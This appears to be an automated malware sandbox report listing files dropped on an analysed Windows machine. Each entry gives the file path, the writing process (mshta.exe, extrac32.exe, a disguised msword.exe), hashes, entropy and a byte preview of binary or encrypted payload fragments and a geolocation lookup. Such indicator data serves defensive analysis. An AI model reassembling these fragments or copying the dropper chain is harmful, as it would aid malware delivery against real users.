                                                                  Preview:?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Clinton

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):4.910075425726921
                                                                  Encrypted:false
                                                                  SSDEEP:768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
                                                                  MD5:2BC25537976C2E146EBED51446CE7B59
                                                                  SHA1:0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
                                                                  SHA-256:F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
                                                                  SHA-512:7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
                                                                  Malicious:false
                                                                  Preview:................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.............................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):72704
                                                                  Entropy (8bit):7.997164994069138
                                                                  Encrypted:true
                                                                  SSDEEP:1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
                                                                  MD5:990ABD973C6DDB75837EEB5B21F59AE1
                                                                  SHA1:85846C0CE7CD3314DEC32E3BED99511A59B6500A
                                                                  SHA-256:29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
                                                                  SHA-512:179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
                                                                  Malicious:false
                                                                  Preview:.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...y*w..1...V.~........h\pK3m ........(h..|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[|.."}...E...../.$.......d.|..X.-^.d.F"..".W..(..<.........HQ............M!c......?*Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Constitute

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):144384
                                                                  Entropy (8bit):6.494296209067955
                                                                  Encrypted:false
                                                                  SSDEEP:3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
                                                                  MD5:57BB8B206C43DDE57D7066A4DEDB272C
                                                                  SHA1:E3B400206A6D3C7C5885CB56BFCAB82220BB110A
                                                                  SHA-256:821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
                                                                  SHA-512:C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
                                                                  Malicious:false
                                                                  Preview:..F...................E....;E...MN..;...EN.........H......T...$.P*A........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.x*A....c.......Z...;...|....N......u........P..................S.......*A..$..*A......V.......1....7........u...S...l....q...........h....$..*A....N...V...]....M...H..........$..*A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\David

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):56320
                                                                  Entropy (8bit):7.996610067500435
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
                                                                  MD5:583A66DF71B30CE556F3F5131162AA1C
                                                                  SHA1:0594EF5DF9510410B520282D9C833D604969865A
                                                                  SHA-256:83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
                                                                  SHA-512:3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
                                                                  Malicious:false
                                                                  Preview:J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T*.&.c..G. .....q.B..Sf..........M....m.A|..S.N.:....?0R*....$*:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a*.\..R.-.w....b.1..g..yJL...)...A*J.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......*J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Different

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70656
                                                                  Entropy (8bit):6.548010857173451
                                                                  Encrypted:false
                                                                  SSDEEP:1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
                                                                  MD5:56BB83409EE3E1A9DDF64E5364CBAAF6
                                                                  SHA1:C3DA7B105A8C389BE6381804CB96BB0461476E39
                                                                  SHA-256:D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
                                                                  SHA-512:59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
                                                                  Malicious:false
                                                                  Preview:U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dressing

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):137216
                                                                  Entropy (8bit):6.481339286025911
                                                                  Encrypted:false
                                                                  SSDEEP:3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
                                                                  MD5:1CB233987779B587705687B7D8F66A01
                                                                  SHA1:5F33D543C24701D370072BB4E77E4A8D058AE035
                                                                  SHA-256:48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
                                                                  SHA-512:56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
                                                                  Malicious:false
                                                                  Preview:.j.....I......u0..$.I....Q..|....L..t..I8.A..|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..|:...L:.t..I8.A..|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..|1...D1.t..@8.H...|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..|1...T1.t..R8.B..|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..|....T..t..R8.B..|....D..t..@8.@.....>_^3.[]...U

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0o8vth[1].bat

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (904), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5541
                                                                  Entropy (8bit):5.2664681958555635
                                                                  Encrypted:false
                                                                  SSDEEP:96:CincTy8G+hpQyuPmhDGEhtKCZ+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:CincTy8G+hpQyuPmhDGEhtKCLCjaob39
                                                                  MD5:30F0E17A1AD41BCDC9A52049E5DA1884
                                                                  SHA1:FE3996616238A93B458232F693D8A4FE654C66C3
                                                                  SHA-256:7C8949DBD5C68356292318F49EEC561EAFF17E4056101AFA945176F4C9E46398
                                                                  SHA-512:8FE9485BC6DABB862BDC315C980C9E58D9A49D4BD5D616B12C870A5342718544E6ED00D3041787E1C21CD614A968DAF45C3D145742CA768AD49BFA546886D6C7
                                                                  Malicious:true
                                                                  Preview::: .... ... ......... ...... ... .. ...... ... .. ......... ... ....... ..:: ....... ...... . ... ...... .. .... ...... . .... ......... . .... .... .....:: .... ...... ... . .... ..... . ......... .... ................ .... ... ....:: ...... .......... .... . .... ....... ... . ...... ... ....... . .... .... ...:: ... ... .. .... .... . . ..... ......................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):963
                                                                  Entropy (8bit):5.019506780280991
                                                                  Encrypted:false
                                                                  SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                  MD5:7459F6DA71CD5EAF9DBE2D20CA9434AC
                                                                  SHA1:4F60E33E15277F7A632D8CD058EC7DF4728B40BC
                                                                  SHA-256:364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
                                                                  SHA-512:3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
                                                                  Malicious:false
                                                                  Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Indonesia

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):74752
                                                                  Entropy (8bit):6.557400918137722
                                                                  Encrypted:false
                                                                  SSDEEP:1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
                                                                  MD5:15BE985957A02EE4B7D96A3C52FF0016
                                                                  SHA1:B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
                                                                  SHA-256:E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
                                                                  SHA-512:9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
                                                                  Malicious:false
                                                                  Preview:.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Instantly

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):90112
                                                                  Entropy (8bit):6.7085176792029815
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
                                                                  MD5:7FC8AB46CD562FFA0E11F3A308E63FA7
                                                                  SHA1:DD205EA501D6E04EF3217E2D6488DDB6D25F4738
                                                                  SHA-256:5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
                                                                  SHA-512:25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
                                                                  Malicious:false
                                                                  Preview:.F..E.9E.rf.}..u,j.Xj.f.E.E.Pj..E.P.u.....I...t8.}..r:.F..F.;}........).U.......M..D.......M..L.-..F.....0.I....M..._^3.[.....]..U..QSV.u.3.W.}....F..F..E...E.;.s?...S.}...Yf;.u(.F.....u.j.[S.e...Yf;.u..F..F....;}.r.....0.I..._..^[..]..U..QV.u.V.J...Y..u.2..XW....?...k.0.....M..D0(.t.......@L.......u......M..|0).u.2....E.P.....M..t0.....I......_^..]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E..&...f...f...............e......;.s...C<.u..F....G...E.G;.......r......+.......j.PW......PQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh.....

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Led

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):147456
                                                                  Entropy (8bit):6.70232349488191
                                                                  Encrypted:false
                                                                  SSDEEP:3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
                                                                  MD5:C038EEFE422386831ACF8D9D6898D464
                                                                  SHA1:9CF7F3E9A50218D5E03617B793EAE447645E6A90
                                                                  SHA-256:1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
                                                                  SHA-512:8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
                                                                  Malicious:false
                                                                  Preview:J..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M...d....E....E.}....R....M.@.E.;............}..E..............;~|.............}....}.t...%....=....u .......................}.................L.............M.,K.......K.... cL....t....t..._t.3........;E........E.M.@.E.;...X.........}..E..............;~|.............}...}..M.t3...M.%....=....u"............%...............}..M.E....@.K....@.K.9U.r..@.;.t'..;.s.}.........E.M.@.E.;...s....<....}..........}..E..............;~|..%..........}....}.t...%....=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Leisure

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):61440
                                                                  Entropy (8bit):7.997097243867807
                                                                  Encrypted:true
                                                                  SSDEEP:1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
                                                                  MD5:838511D6727BE6237C1E4CD26A0885DE
                                                                  SHA1:7A9FFA35532A5817F04CB48C9E154B5C9DE74623
                                                                  SHA-256:D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
                                                                  SHA-512:AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
                                                                  Malicious:false
                                                                  Preview:.~. ....)........5a.<......E.Ft.q/.....0....U.......d...l..4MQnM.o.`.bL.*.s./.<;.l..l.;aG._-.0.."/B.6G/....E!........R.C>N.%...D..y2...z.!....z...i......eT....3....e.z;..1........,..65..I b0n.U....B.#<.5..Q=U..%.%.7a[.|....`..o-s....QW%....bx.^.....5..<.[p.i.(&y...m.H..qS:.*pR.....!..P...o.].]o./..Yb0.H8?A.....V.n.1...%.>..'.......j:<;.?._....u.o..5..g]S.nT...J.K<&..yC..&xn.-..r.7..!.4\..aR."Nh+.....*....Y..'...I..(r..-..p=..vn...lA..Z7.....Y1.......'.3T.....g..p...."N....w?Y.;.......x}.........\R{........b...........H...o....%..=."....|>j.f....FA...".z.qt...}...4.q3..b...K....o...-?t0.(....~.......,.C.3#7N.....k..p......l9P.b=qo...y$=P...%s.^.....[w...%.41..X.(.(:.a......_..t=e...$.I...?.!.2..m.e.*..>.''3..L..H.... .k..4.!.p.L....u..#......\...j......GF..+..K.u.J9&........~CUw..........m.q$V..._..n..9.J{.+f...I.x.z]%~.7A*..rF`......>.w8..z.....x..>X.#5.RO.F.e.B.xpw...q^...2<.71......../c.}.........2.k.^=..Pc...~.e.m.^...s.j..Kd...._.<.7...

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Math

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):76800
                                                                  Entropy (8bit):7.997538946660952
                                                                  Encrypted:true
                                                                  SSDEEP:1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
                                                                  MD5:7B5C9E82025D184E64A7413174CE1A1C
                                                                  SHA1:C552965CE73D43225541932D65C3B4B6342A70E4
                                                                  SHA-256:7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
                                                                  SHA-512:71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
                                                                  Malicious:false
                                                                  Preview:/@.......S7....S......L.<.s....0..8....v...$7.9...H..3..r.>:q.w.].B.#v...CU....\..-....,...Y..FUp.RYd...$e...O.7...9/._.J.....u>...K..8@k.......V..y.l.._.W&.Ix.-.}@tQ.~.UT.I.n.O..b..O ..]...a....fN.d..O.[.t.v...1..gt.u...$......`.Q...n;mds...'.o..s..N......NhO.p......a.k.....h.7r..w...FP.yO..2..%?.=.s.7#RA/..Y.f.......u.....JM..........:eR3.V...&..|}.F.v.m....@...=...V..%.I.vX.x .Iv....p$.+dZ...T...4...(G...ez.O..%...8$;n. ..r7.V3.!...y...t.....Yz.<.??..W...W....tg..>..*..a.d..}.N*.Jp...F.....!c.H.0,j..'#T.4:..q...Lt...n.........Kz.......G.'.)..x..g..."b.W.v\...v.`.\.V...W......~D.....0.(z.H.Y....T....}.`..<..%.Th........!....7.....A+q...?..l.MEHT.2..HW.....g.&.k........6GA.5.^...k..Tv9+k...24....t....5'.K.]..=l{.`..S.^6.<...!.Y.q.tmCYZ...........@O@.U.....qJ9.v^.`=....4aw...t..._ .U.FP..p,..[..7....F..'.\.R}6pI.$.'....Q.........../.H.....p.M9..Y..A!_..i......0.%......3xf..h5.g ......g.\Q.-1.T"...Ta.....]AC..._.2=n.3.`.r%....~.S.f

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Measurement

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1237
                                                                  Entropy (8bit):3.752009061763574
                                                                  Encrypted:false
                                                                  SSDEEP:12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
                                                                  MD5:47FE88841F7CEA67286B6BB812A7A09F
                                                                  SHA1:950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
                                                                  SHA-256:33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
                                                                  SHA-512:C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
                                                                  Malicious:false
                                                                  Preview:Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Missed

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70656
                                                                  Entropy (8bit):5.9158452815608795
                                                                  Encrypted:false
                                                                  SSDEEP:1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
                                                                  MD5:E6FE42ADC3082D12E845756426492B6E
                                                                  SHA1:E1170EE049AB607162D1495B625AA74221AA8585
                                                                  SHA-256:BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
                                                                  SHA-512:9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
                                                                  Malicious:false
